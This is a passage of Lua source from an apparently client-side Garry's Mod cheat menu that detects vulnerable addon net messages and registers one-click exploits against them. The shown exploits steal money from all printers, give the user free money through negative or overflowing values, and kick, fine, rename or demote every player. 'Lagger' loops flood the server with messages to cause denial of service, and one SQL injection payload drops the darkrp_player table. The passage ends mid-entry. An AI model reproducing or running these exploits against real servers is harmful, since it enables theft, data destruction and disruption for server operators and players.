  1719. ECPrint("Found Exploit: Disguise [disguise]")
  1720. addExploit( "73","Disguise", "allows you to disguise as any job", function()
  1721. surface.PlaySound("garrysmod/ui_click.wav")
  1722. inputFrameExists = true
  1723. inputFrame = vgui.Create( "DFrame" )
  1724. inputFrame:SetTitle("Enter the number of the job")
  1725. inputFrame:SetSize( 400, 75 )
  1726. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1727. inputFrame:SetDraggable(false)
  1728. inputFrame:ShowCloseButton(true)
  1729. inputFrame:MakePopup()
  1730. inputFrame.Paint = function( self, w, h )
  1731. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1732. end
  1733. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1734. TextEntry:SetSize( 380, 30 )
  1735. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1736. TextEntry:SetText( "5" )
  1737. TextEntry.OnEnter = function( self )
  1738. surface.PlaySound("garrysmod/ui_click.wav")
  1739. ECNotify("Disguised")
  1740. net.Start("disguise")
  1741. net.WriteInt(tonumber(self:GetValue()), 32)
  1742. net.SendToServer()
  1743. inputFrame:SetVisible(false)
  1744. end
  1745. end )
  1746. end
  1748. status = ValidNetString("gportal_rpname_change")
  1749. if (status) then
  1750. ECPrint("Found Exploit: Your RP Name #1 [gportal_rpname_change]")
  1751. addExploit( "74","Your RP Name #1", "allows you to put absolutely any rp name", function()
  1752. surface.PlaySound("garrysmod/ui_click.wav")
  1753. inputFrameExists = true
  1754. inputFrame = vgui.Create( "DFrame" )
  1755. inputFrame:SetTitle("Enter your name")
  1756. inputFrame:SetSize( 400, 75 )
  1757. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1758. inputFrame:SetDraggable(false)
  1759. inputFrame:ShowCloseButton(true)
  1760. inputFrame:MakePopup()
  1761. inputFrame.Paint = function( self, w, h )
  1762. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1763. end
  1764. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1765. TextEntry:SetSize( 380, 30 )
  1766. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1767. TextEntry:SetText( "--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" )
  1768. TextEntry.OnEnter = function( self )
  1769. surface.PlaySound("garrysmod/ui_click.wav")
  1770. ECNotify("Changed")
  1771. net.Start("gportal_rpname_change")
  1772. net.WriteString( (self:GetValue()), 32)
  1773. net.WriteString(" ")
  1774. net.SendToServer()
  1775. inputFrame:SetVisible(false)
  1776. end
  1777. end )
  1778. end
  1780. status = ValidNetString("NewRPNameSQL")
  1781. if (status) then
  1782. ECPrint("Found Exploit: Your RP Name #2 [NewRPNameSQL]")
  1783. addExploit( "75","Your RP Name #2", "allows you to put absolutely any rp name", function()
  1784. surface.PlaySound("garrysmod/ui_click.wav")
  1785. inputFrameExists = true
  1786. inputFrame = vgui.Create( "DFrame" )
  1787. inputFrame:SetTitle("Enter your name")
  1788. inputFrame:SetSize( 400, 75 )
  1789. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1790. inputFrame:SetDraggable(false)
  1791. inputFrame:ShowCloseButton(true)
  1792. inputFrame:MakePopup()
  1793. inputFrame.Paint = function( self, w, h )
  1794. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1795. end
  1796. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1797. TextEntry:SetSize( 380, 30 )
  1798. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1799. TextEntry:SetText( "--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" )
  1800. TextEntry.OnEnter = function( self )
  1801. surface.PlaySound("garrysmod/ui_click.wav")
  1802. ECNotify("Changed")
  1803. net.Start("NewRPNameSQL")
  1804. net.WriteString( (self:GetValue()), 32)
  1805. net.SendToServer()
  1806. inputFrame:SetVisible(false)
  1807. end
  1808. end )
  1809. end
  1811. status = ValidNetString("chname")
  1812. if (status) then
  1813. ECPrint("Found Exploit: Your RP Name #3 [chname]")
  1814. addExploit( "76","Your RP Name #3", "discovered by Leith", function()
  1815. surface.PlaySound("garrysmod/ui_click.wav")
  1816. inputFrameExists = true
  1817. inputFrame = vgui.Create( "DFrame" )
  1818. inputFrame:SetTitle("Enter your name")
  1819. inputFrame:SetSize( 400, 75 )
  1820. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1821. inputFrame:SetDraggable(false)
  1822. inputFrame:ShowCloseButton(true)
  1823. inputFrame:MakePopup()
  1824. inputFrame.Paint = function( self, w, h )
  1825. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1826. end
  1827. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1828. TextEntry:SetSize( 380, 30 )
  1829. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1830. TextEntry:SetText( "--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" )
  1831. TextEntry.OnEnter = function( self )
  1832. surface.PlaySound("garrysmod/ui_click.wav")
  1833. ECNotify("Changed")
  1834. net.Start("chname")
  1835. net.WriteString( (self:GetValue()) )
  1836. net.WriteString(" ")
  1837. net.SendToServer()
  1838. inputFrame:SetVisible(false)
  1839. end
  1840. end )
  1841. end
  1843. status = ValidNetString("AbilityUse")
  1844. if (status) then
  1845. ECPrint("Found Exploit: Free Bonus [AbilityUse]")
  1846. addExploit( "77","Free Bonus", "allows you to instantly get bonuses", function()
  1847. surface.PlaySound("garrysmod/ui_click.wav")
  1848. for k, v in ipairs(rp.abilities.list) do
  1849. ECPrint("ID - "..k.." | "..v:GetName())
  1850. inputFrameExists = true
  1851. inputFrame = vgui.Create( "DFrame" )
  1852. inputFrame:SetTitle("Enter the id of the bonus")
  1853. inputFrame:SetSize( 400, 75 )
  1854. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1855. inputFrame:SetDraggable(false)
  1856. inputFrame:ShowCloseButton(true)
  1857. inputFrame:MakePopup()
  1858. inputFrame.Paint = function( self, w, h )
  1859. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1860. end
  1861. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1862. TextEntry:SetSize( 380, 30 )
  1863. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1864. TextEntry:SetText( "6" )
  1865. TextEntry.OnEnter = function( self )
  1866. surface.PlaySound("garrysmod/ui_click.wav")
  1867. ECNotify("Received")
  1868. net.Start("AbilityUse")
  1869. net.WriteInt(tonumber(self:GetValue()), 32)
  1870. net.SendToServer()
  1871. inputFrame:SetVisible(false)
  1872. end
  1873. end
  1874. end )
  1875. end
  1877. status = ValidNetString("race_accept")
  1878. if (status) then
  1879. ECPrint("Found Exploit: Get Car [race_accept]")
  1880. addExploit( "78","Get Car", "", function()
  1881. surface.PlaySound("garrysmod/ui_click.wav")
  1882. inputFrameExists = true
  1883. inputFrame = vgui.Create( "DFrame" )
  1884. inputFrame:SetTitle("Enter the id of the car")
  1885. inputFrame:SetSize( 400, 75 )
  1886. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1887. inputFrame:SetDraggable(false)
  1888. inputFrame:ShowCloseButton(true)
  1889. inputFrame:MakePopup()
  1890. inputFrame.Paint = function( self, w, h )
  1891. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1892. end
  1893. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1894. TextEntry:SetSize( 380, 30 )
  1895. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1896. TextEntry:SetText( "1" )
  1897. TextEntry.OnEnter = function( self )
  1898. surface.PlaySound("garrysmod/ui_click.wav")
  1899. ECNotify("Starting")
  1900. net.Start("race_accept")
  1901. net.WriteInt(tonumber(self:GetValue()), 32)
  1902. net.SendToServer()
  1903. end
  1904. end )
  1905. end
  1907. status = ValidNetString("NLR_SPAWN")
  1908. if (status) then
  1909. ECPrint("Found Exploit: Respawn #3 [NLR_SPAWN]")
  1910. addExploit( "79","Respawn #3", "instant revival", function()
  1911. surface.PlaySound("garrysmod/ui_click.wav")
  1912. ECNotify("Starting")
  1913. net.Start("NLR_SPAWN")
  1914. net.WriteEntity(LocalPlayer())
  1915. net.SendToServer()
  1916. end )
  1917. end
  1919. status = ValidNetString("Kun_ZiptieStruggle")
  1920. if (status) then
  1921. ECPrint("Found Exploit: Break Handcuffs [Kun_ZiptieStruggle]")
  1922. addExploit( "80","Break Handcuffs", "Instantly breaks the handcuffs", function()
  1923. surface.PlaySound("garrysmod/ui_click.wav")
  1924. ECNotify("Starting")
  1925. for i=0,30 do
  1926. net.Start("Kun_ZiptieStruggle")
  1927. net.SendToServer()
  1928. end
  1929. end )
  1930. end
  1932. status = ValidNetString("JB_Votekick")
  1933. if (status) then
  1934. ECPrint("Found Exploit: Abuses Jailbreak Votekick [JB_Votekick]")
  1935. addExploit( "81","Abuses Jailbreak Votekick", "kick all players", function()
  1936. surface.PlaySound("garrysmod/ui_click.wav")
  1937. ECNotify("Starting")
  1938. for k,v in pairs(player.GetAll()) do
  1939. net.Start("JB_Votekick")
  1940. net.WriteEntity(v)
  1941. net.WriteString("what? what? what? what? what? what? what? what? what? what? what? what? what? what? what? what? what? ")
  1942. net.SendToServer()
  1943. end
  1944. end )
  1945. end
  1947. status = ValidNetString("Letthisdudeout")
  1948. if (status) then
  1949. ECPrint("Found Exploit: ByB Force Bail [Letthisdudeout]")
  1950. addExploit( "82","ByB Force Bail", "exploit on all Byb servers to bail yourself out", function()
  1951. surface.PlaySound("garrysmod/ui_click.wav")
  1952. ECNotify("Starting")
  1953. net.Start("Letthisdudeout")
  1954. net.WriteEntity(LocalPlayer())
  1955. net.SendToServer()
  1956. end )
  1957. end
  1959. status = ValidNetString("opr_withdraw")
  1960. if (status) then
  1961. ECPrint("Found Exploit: Lagger #14 [opr_withdraw]")
  1962. addExploit( "83","Lagger #14", "discovered by Leith", function()
  1963. surface.PlaySound("garrysmod/ui_click.wav")
  1964. ECNotify("Starting")
  1965. timer.Create("lagger14", 0,0, function()
  1966. for i = 1, 1000 do
  1967. net.Start("opr_withdraw",true)
  1968. net.WriteEntity(LocalPlayer())
  1969. net.SendToServer()
  1970. end
  1971. end )
  1972. end )
  1973. end
  1975. status = ValidNetString("NC_GetNameChange")
  1976. if (status) then
  1977. ECPrint("Found Exploit: Change all names [NC_GetNameChange]")
  1978. addExploit( "84","Change all names", "allows you to change the rp names of all players", function()
  1979. surface.PlaySound("garrysmod/ui_click.wav")
  1980. inputFrameExists = true
  1981. inputFrame = vgui.Create( "DFrame" )
  1982. inputFrame:SetTitle("Enter the name")
  1983. inputFrame:SetSize( 400, 75 )
  1984. inputFrame:SetPos(ScrW() / 2 - inputFrame:GetWide() / 2, ScrH() / 2 + 230 )
  1985. inputFrame:SetDraggable(false)
  1986. inputFrame:ShowCloseButton(true)
  1987. inputFrame:MakePopup()
  1988. inputFrame.Paint = function( self, w, h )
  1989. draw.RoundedBox( 5, 0, 0, w, h, Color(30, 30, 30))
  1990. end
  1991. local TextEntry = vgui.Create( "DTextEntry", inputFrame )
  1992. TextEntry:SetSize( 380, 30 )
  1993. TextEntry:SetPos( inputFrame:GetWide() / 2 - TextEntry:GetWide() / 2, inputFrame:GetTall() / 2 - TextEntry:GetTall() / 2 )
  1994. TextEntry:SetText( "AHAHAHAHAH" )
  1995. TextEntry.OnEnter = function( self )
  1996. surface.PlaySound("garrysmod/ui_click.wav")
  1997. ECNotify("Starting")
  1998. for k, v in pairs( player.GetAll() ) do
  1999. net.Start("NC_GetNameChange")
  2000. net.WriteEntity(v)
  2001. net.WriteString( (self:GetValue()) )
  2002. net.WriteString( (self:GetValue()) )
  2003. net.SendToServer()
  2004. end
  2005. end
  2006. end )
  2007. end
  2009. status = ValidNetString("revival_revive_accept")
  2010. if (status) then
  2011. ECPrint("Found Exploit: Reanimation #2 [revival_revive_accept]")
  2012. addExploit( "85","Reanimation #2", "instant revival, discovered by Leith", function()
  2013. surface.PlaySound("garrysmod/ui_click.wav")
  2014. if !timer.Exists( "exploit_revive" ) then
  2015. ECNotify( "Enabled" )
  2016. timer.Create( "exploit_revive", 0.5, 0, function()
  2017. if !LocalPlayer():Alive() then
  2018. net.Start("revival_revive_accept")
  2019. net.SendToServer()
  2020. end
  2021. end )
  2022. else
  2023. timer.Remove( "exploit_revive" )
  2024. ECNotify( "Disabled" )
  2025. end
  2026. end )
  2027. end
  2029. status = ValidNetString("join_disconnect")
  2030. if (status) then
  2031. ECPrint("Found Exploit: Lagger #15 [join_disconnect]")
  2032. addExploit( "86","Lagger #15", "b1g lags my duder", function()
  2033. surface.PlaySound("garrysmod/ui_click.wav")
  2034. ECNotify("Starting")
  2035. if not timer.Exists("lagger15") then
  2036. timer.Create("lagger15", 0.5, 0, function()
  2037. for i = 1, 3000 do
  2038. net.Start("join_disconnect",true)
  2039. net.WriteEntity(table.Random(player.GetAll()))
  2040. net.SendToServer()
  2041. end
  2042. end)
  2043. else
  2044. timer.Remove("lagger15")
  2045. ECNotify("Stopping")
  2046. end
  2047. end )
  2048. end
  2050. status = ValidNetString("BuyFirstTovar")
  2051. if (status) then
  2052. ECPrint("Found Exploit: Free Physgun [BuyFirstTovar]")
  2053. addExploit( "87","Free Physgun", "get physgun", function()
  2054. surface.PlaySound("garrysmod/ui_click.wav")
  2055. ECNotify("Take physgun")
  2056. net.Start("BuyFirstTovar")
  2057. net.WriteString("0")
  2058. net.SendToServer()
  2059. end )
  2060. end
  2062. status = ValidNetString("BuySecondTovar")
  2063. if (status) then
  2064. ECPrint("Found Exploit: Free Gravitygun [BuySecondTovar]")
  2065. addExploit( "88","Free Gravitygun", "get gravitygun", function()
  2066. surface.PlaySound("garrysmod/ui_click.wav")
  2067. ECNotify("Take gravitygun")
  2068. net.Start("BuySecondTovar")
  2069. net.WriteString("0")
  2070. net.SendToServer()
  2071. end )
  2072. end
  2074. status = ValidNetString("MONEY_SYSTEM_GetWeapons")
  2075. if (status) then
  2076. ECPrint("Found Exploit: Give Weapons #2 [MONEY_SYSTEM_GetWeapons]")
  2077. addExploit( "89","Give Weapons #2", "get weapons", function()
  2078. surface.PlaySound("garrysmod/ui_click.wav")
  2079. ECNotify("Starting")
  2080. for i = 1,32 do
  2081. net.Start("MONEY_SYSTEM_GetWeapons")
  2082. net.WriteInt(i, 8)
  2083. net.SendToServer()
  2084. end
  2085. end )
  2086. end
  2088. status = ValidNetString("MCon_Demote_ToServer")
  2089. if (status) then
  2090. ECPrint("Found Exploit: Demote All Players #2 [MCon_Demote_ToServer]")
  2091. addExploit( "90","Demote All Players #2", "demote all players", function()
  2092. surface.PlaySound("garrysmod/ui_click.wav")
  2093. ECNotify("Starting")
  2094. for k,v in pairs(player.GetAll()) do
  2095. net.Start("MCon_Demote_ToServer")
  2096. net.WriteString(v:SteamID())
  2097. net.SendToServer()
  2098. end
  2099. end )
  2100. end
  2102. status = ValidNetString("withdrawMoney")
  2103. if (status) then
  2104. ECPrint("Found Exploit: Steal All Monies #3 [withdrawMoney]")
  2105. addExploit( "91","Steal All Monies #3", "withdraw money from all printers, discovered by Leith", function()
  2106. surface.PlaySound("garrysmod/ui_click.wav")
  2107. ECNotify("Starting")
  2108. for k, v in pairs(ents.GetAll()) do
  2109. net.Start("withdrawMoney")
  2110. net.WriteEntity(v)
  2111. net.SendToServer()
  2112. end
  2113. end )
  2114. end
  2116. status = ValidNetString("withdrawMoney")
  2117. if (status) then
  2118. ECPrint("Found Exploit: Lagger #16 [withdrawMoney]")
  2119. addExploit( "92","Lagger #16", "discovered by Leith", function()
  2120. surface.PlaySound("garrysmod/ui_click.wav")
  2121. ECNotify("Starting")
  2122. timer.Create("lagger16", 0, 0, function()
  2123. for i=1,1000 do
  2124. net.Start("withdrawMoney",true)
  2125. net.WriteEntity(LocalPlayer())
  2126. net.SendToServer()
  2127. end
  2128. end )
  2129. end )
  2130. end
  2132. status = ValidNetString("SyncPrinterButtons76561198027292625")
  2133. if (status) then
  2134. ECPrint("Found Exploit: Steal All Monies #4 [SyncPrinterButtons76561198027292625]")
  2135. addExploit( "93","Steal All Monies #4", "withdraw money from all printers", function()
  2136. surface.PlaySound("garrysmod/ui_click.wav")
  2137. ECNotify("Starting")
  2138. for k, v in pairs(ents.GetAll()) do
  2139. net.Start("SyncPrinterButtons76561198027292625")
  2140. net.WriteEntity(v)
  2141. net.WriteUInt(2, 4)
  2142. net.SendToServer()
  2143. end
  2144. end )
  2145. end
  2147. status = ValidNetString("gPrinters.retrieveMoney")
  2148. if (status) then
  2149. ECPrint("Found Exploit: Steal All Monies #5 [gPrinters.retrieveMoney]")
  2150. addExploit( "94","Steal All Monies #5", "withdraw money from all printers, discovered by Leith", function()
  2151. surface.PlaySound("garrysmod/ui_click.wav")
  2152. ECNotify("Starting")
  2153. for k, v in pairs(ents.GetAll()) do
  2154. net.Start("gPrinters.retrieveMoney")
  2155. net.WriteEntity(v)
  2156. net.SendToServer()
  2157. end
  2158. end )
  2159. end
  2161. status = ValidNetString("gPrinters.retrieveMoney")
  2162. if (status) then
  2163. ECPrint("Found Exploit: Lagger #17 [gPrinters.retrieveMoney]")
  2164. addExploit( "95","Lagger #17", "discovered by Leith", function()
  2165. surface.PlaySound("garrysmod/ui_click.wav")
  2166. ECNotify("Starting")
  2167. timer.Create("lagger17", 0, 0, function()
  2168. for i=1,1000 do
  2169. net.Start("gPrinters.retrieveMoney",true)
  2170. net.WriteEntity(LocalPlayer())
  2171. net.SendToServer()
  2172. end
  2173. end )
  2174. end )
  2175. end
  2177. status = ValidNetString("NGII_TakeMoney")
  2178. if (status) then
  2179. ECPrint("Found Exploit: Steal All Monies #6 [NGII_TakeMoney]")
  2180. addExploit( "96","Steal All Monies #6", "withdraw money from all printers", function()
  2181. surface.PlaySound("garrysmod/ui_click.wav")
  2182. ECNotify("Starting")
  2183. for k, v in pairs(ents.GetAll()) do
  2184. net.Start("NGII_TakeMoney")
  2185. net.WriteEntity(v)
  2186. net.WriteEntity(LocalPlayer())
  2187. net.SendToServer()
  2188. end
  2189. end )
  2190. end
  2192. status = ValidNetString("money_clicker_withdraw")
  2193. if (status) then
  2194. ECPrint("Found Exploit: Lagger #18 [money_clicker_withdraw]")
  2195. addExploit( "97","Lagger #18", "discovered by Leith", function()
  2196. surface.PlaySound("garrysmod/ui_click.wav")
  2197. ECNotify("Starting")
  2198. timer.Create("lagger18", 0, 0, function()
  2199. for i=1,1000 do
  2200. net.Start("money_clicker_withdraw",true)
  2201. net.WriteEntity(LocalPlayer())
  2202. net.SendToServer()
  2203. end
  2204. end )
  2205. end )
  2206. end
  2208. status = ValidNetString("opr_withdraw")
  2209. if (status) then
  2210. ECPrint("Found Exploit: Steal All Monies #7 [opr_withdraw]")
  2211. addExploit( "98","Steal All Monies #7", "withdraw money from all printers", function()
  2212. surface.PlaySound("garrysmod/ui_click.wav")
  2213. ECNotify("Starting")
  2214. for k, v in pairs(ents.GetAll()) do
  2215. net.Start("opr_withdraw")
  2216. net.WriteEntity(v)
  2217. net.SendToServer()
  2218. end
  2219. end )
  2220. end
  2222. status = ValidNetString("NET_DoPrinterAction")
  2223. if (status) then
  2224. ECPrint("Found Exploit: Steal All Monies #8 [NET_DoPrinterAction]")
  2225. addExploit( "99","Steal All Monies #8", "withdraw money from all printers", function()
  2226. surface.PlaySound("garrysmod/ui_click.wav")
  2227. ECNotify("Starting")
  2228. for k, v in pairs(ents.GetAll()) do
  2229. if v:GetClass():find("print") then
  2230. net.Start("NET_DoPrinterAction")
  2231. net.WriteEntity(LocalPlayer())
  2232. net.WriteEntity(v)
  2233. net.WriteInt(2,16)
  2234. net.SendToServer()
  2235. end
  2236. end
  2237. end )
  2238. end
  2240. status = ValidNetString("tickbooksendfine")
  2241. if (status) then
  2242. ECPrint("Found Exploit: Ticket Book [tickbooksendfine]")
  2243. addExploit( "100","Ticket Book", "allows you to write a fine to all players, discovered by Leith", function()
  2244. surface.PlaySound("garrysmod/ui_click.wav")
  2245. ECNotify("Starting")
  2246. local reasonstable = {"NICE EXPLOIT, RIGHT?"}
  2247. for k, v in pairs(player.GetAll()) do
  2248. if v != LocalPlayer() then
  2249. net.Start("tickbooksendfine")
  2250. net.WriteString(v:SteamID())
  2251. net.WriteTable(reasonstable)
  2252. net.WriteDouble(3000, 32)
  2253. net.SendToServer()
  2254. end
  2255. end
  2256. end )
  2257. end
  2259. status = ValidNetString("SyncPrinterButtons16690")
  2260. if (status) then
  2261. ECPrint("Found Exploit: Steal All Monies #9 [SyncPrinterButtons16690]")
  2262. addExploit( "101","Steal All Monies #9", "withdraw money from all printers", function()
  2263. surface.PlaySound("garrysmod/ui_click.wav")
  2264. ECNotify("Starting")
  2265. for k, v in pairs(ents.GetAll()) do
  2266. if v:GetModel() == "models/props_c17/consolebox01a.mdl" then
  2267. net.Start("SyncPrinterButtons16690")
  2268. net.WriteEntity(v)
  2269. net.WriteUInt(2, 4)
  2270. net.SendToServer()
  2271. end
  2272. end
  2273. end)
  2274. end
  2276. status = ValidNetString("withdrawp")
  2277. if (status) then
  2278. ECPrint("Found Exploit: Steal All Monies #10 [withdrawp]")
  2279. addExploit( "102","Steal All Monies #10", "withdraw money from all printers", function()
  2280. surface.PlaySound("garrysmod/ui_click.wav")
  2281. ECNotify("Starting")
  2282. for k,v in pairs(ents.FindByClass("derma_printer")) do
  2283. net.Start("withdrawp")
  2284. net.WriteEntity(v)
  2285. net.SendToServer()
  2286. end
  2287. end)
  2288. end
  2290. status = ValidNetString("withdrawp")
  2291. if (status) then
  2292. ECPrint("Found Exploit: Lagger #19 [withdrawp]")
  2293. addExploit( "103","Lagger #19", "discovered by Leith", function()
  2294. surface.PlaySound("garrysmod/ui_click.wav")
  2295. ECNotify("Starting")
  2296. timer.Create("lagger19", 0, 0, function()
  2297. for i=1,1000 do
  2298. net.Start("withdrawp",true)
  2299. net.WriteEntity(LocalPlayer())
  2300. net.SendToServer()
  2301. end
  2302. end )
  2303. end )
  2304. end
  2306. status = ValidNetString("DarkRP_SS_Gamble")
  2307. if (status) then
  2308. ECPrint("Found Exploit: Free Money #3 [DarkRP_SS_Gamble]")
  2309. addExploit( "104","Free Money #3", "an exploit in the addon 'DarkRP Casino'", function()
  2310. surface.PlaySound("garrysmod/ui_click.wav")
  2311. ECNotify("Starting")
  2312. net.Start("DarkRP_SS_Gamble")
  2313. net.WriteInt(99999, 32)
  2314. net.WriteInt(1, 32)
  2315. net.WriteInt(0, 32)
  2316. net.WriteInt(0, 32)
  2317. net.WriteInt(1, 32)
  2318. net.SendToServer()
  2319. end )
  2320. end
  2322. status = ValidNetString("PCAdd")
  2323. if (status) then
  2324. ECPrint("Found Exploit: Delete Promocode [PCAdd]")
  2325. addExploit( "105","Delete Promocode", "delete all promocodes", function()
  2326. surface.PlaySound("garrysmod/ui_click.wav")
  2327. ECNotify("Starting")
  2328. net.Start("PCAdd")
  2329. net.WriteString("alahman")
  2330. net.WriteString("300000000")
  2331. net.SendToServer()
  2332. timer.Simple(3,function()
  2333. net.Start("ActivatePC")
  2334. net.WriteString("alahman")
  2335. net.SendToServer()
  2336. net.Start("PCDelAll")
  2337. net.SendToServer()
  2338. end )
  2339. end )
  2340. end
  2342. status = ValidNetString("viv_hl2rp_disp_message")
  2343. if (status) then
  2344. ECPrint("Found Exploit: HL2 Disp Message [viv_hl2rp_disp_message]")
  2345. addExploit( "106","HL2 Disp Message", "hl2 voice commands", function()
  2346. surface.PlaySound("garrysmod/ui_click.wav")
  2347. ECNotify("Starting")
  2348. for name, command in pairs (dispatchCommands) do
  2349. net.Start("viv_hl2rp_disp_message")
  2350. net.WriteString(command)
  2351. net.SendToServer()
  2352. end
  2353. end )
  2354. end
  2356. status = ValidNetString("Kun_SellDrug")
  2357. if (status) then
  2358. ECPrint("Found Exploit: Free Money #4 [Kun_SellDrug]")
  2359. addExploit( "107","Free Money #4", "get monies", function()
  2360. surface.PlaySound("garrysmod/ui_click.wav")
  2361. if !timer.Exists( "freemoney4" ) then
  2362. ECNotify("Starting")
  2363. timer.Create( "freemoney4", 0, 0, function()
  2364. for i=1,1000 do
  2365. net.Start("Kun_SellDrug")
  2366. net.WriteString("mushroom")
  2367. net.SendToServer()
  2368. end
  2369. end)
  2370. else
  2371. timer.Remove( "freemoney4" )
  2372. ECNotify("Stopping")
  2373. end
  2374. end )
  2375. end
  2377. status = ValidNetString("net_PSUnBoxServer")
  2378. if (status) then
  2379. ECPrint("Found Exploit: Point Shop Unbox [net_PSUnBoxServer]")
  2380. addExploit( "108","Point Shop Unbox", "an exploit in the addon 'Point Shop", function()
  2381. surface.PlaySound("garrysmod/ui_click.wav")
  2382. ECNotify("Starting")
  2383. for k,v in pairs(player.GetAll()) do
  2384. local i = 0
  2385. for k2,v2 in pairs(PS.Items) do
  2386. if !v:PS_HasItem(v2.ID) then
  2387. timer.Simple(k*i*1.7,function()
  2388. net.Start("net_PSUnBoxServer")
  2389. net.WriteEntity(v)
  2390. net.WriteString(v2.ID)
  2391. net.SendToServer()
  2392. end)
  2393. i = i + 1
  2394. end
  2395. end
  2396. end
  2397. end )
  2398. end
  2400. status = ValidNetString("pplay_sendtable")
  2401. if (status) then
  2402. ECPrint("Found Exploit: ☢ Fuck the SQL database ☢ [pplay_sendtable]")
  2403. addExploit( "109","☢ Fuck the SQL database ☢", "fuck all", function()
  2404. surface.PlaySound("garrysmod/ui_click.wav")
  2405. ECNotify("Starting")
  2406. local tbl = {}
  2407. tbl.tblname = "darkrp_door; DROP TABLE darkrp_player; CREATE TABLE darkrp_player(a STRING)"
  2408. tbl.ply = LocalPlayer()
  2409. net.Start("pplay_sendtable")
  2410. net.WriteTable(tbl)
  2411. net.SendToServer()
  2412. end )
  2413. end
  2415. status = ValidNetString("75_plus_win")
  2416. if (status) then
  2417. ECPrint("Found Exploit: Free Money #5 [75_plus_win]")
  2418. addExploit( "110","Free Money #5", "get money", function()
  2419. surface.PlaySound("garrysmod/ui_click.wav")
  2420. ECNotify("Starting")
  2421. net.Start("75_plus_win")
  2422. net.WriteString("99999999")
  2423. net.WriteEntity(LocalPlayer())
  2424. net.SendToServer()
  2425. end )
  2426. end
  2428. status = ValidNetString("ATMDepositMoney")
  2429. if (status) then
  2430. ECPrint("Found Exploit: Free Money #6 [ATMDepositMoney]")
  2431. addExploit( "111","Free Money #6", "an exploit in 'ATM'", function()
  2432. surface.PlaySound("garrysmod/ui_click.wav")
  2433. ECNotify("Starting")
  2434. net.Start("ATMDepositMoney")
  2435. net.WriteFloat(-9999999)
  2436. net.SendToServer()
  2437. end )
  2438. end
  2440. status = ValidNetString("SellMinerals")
  2441. if (status) then
  2442. ECPrint("Found Exploit: Free Money #7 [SellMinerals]")
  2443. addExploit( "112","Free Money #7", "an exploit in 'eMining'", function()
  2444. surface.PlaySound("garrysmod/ui_click.wav")
  2445. ECNotify("Starting")
  2446. for k,v in pairs(SkillDB) do
  2447. if not ( v.iSkill == true ) then
  2448. net.Start("Upgrade")
  2449. net.WriteTable( { LuaName = v.LuaName, Amount = -9999999 } )
  2450. net.SendToServer()
  2451. net.Start("SellMinerals")
  2452. net.WriteTable({ Target = LocalPlayer() })
  2453. net.SendToServer()
  2454. end
  2455. end
  2456. end )
  2457. end
  2459. status = ValidNetString("TakeBetMoney")
  2460. if (status) then
  2461. ECPrint("Found Exploit: Free Money #8 [TakeBetMoney]")
  2462. addExploit( "113","Free Money #8", "get money", function()
  2463. surface.PlaySound("garrysmod/ui_click.wav")
  2464. ECNotify("Starting")
  2465. net.Start("TakeBetMoney")
  2466. net.WriteTable({1e333333 , 1e333333})
  2467. net.SendToServer()
  2468. end )
  2469. end
  2471. status = ValidNetString("Kun_SellOil")
  2472. if (status) then
  2473. ECPrint("Found Exploit: Free Money #9 [Kun_SellOil]")
  2474. addExploit( "114","Free Money #9", "get money", function()
  2475. surface.PlaySound("garrysmod/ui_click.wav")
  2476. ECNotify("Starting")
  2477. for k,v in pairs(ents.GetAll()) do
  2478. net.Start("Kun_SellOil")
  2479. net.WriteEntity(v)
  2480. net.SendToServer()
  2481. end
  2482. end )
  2483. end
  2485. status = ValidNetString("DepositMoney")
  2486. if (status) then
  2487. ECPrint("Found Exploit: Free Money #10 [DepositMoney]")
  2488. addExploit( "115","Free Money #10", "get money", function()
  2489. surface.PlaySound("garrysmod/ui_click.wav")
  2490. ECNotify("Starting")
  2491. net.Start("DepositMoney")
  2492. for k,v in pairs(ents.GetAll()) do
  2493. net.WriteEntity(v)
  2494. net.WriteString(-100000000 )
  2495. net.WriteEntity(LocalPlayer())
  2496. net.SendToServer()
  2497. end
  2498. end )
  2499. end
  2501. status = ValidNetString("NET_SS_DoBuyTakeoff")
  2502. if (status) then
  2503. ECPrint("Found Exploit: Free Money #11 [NET_SS_DoBuyTakeoff]")
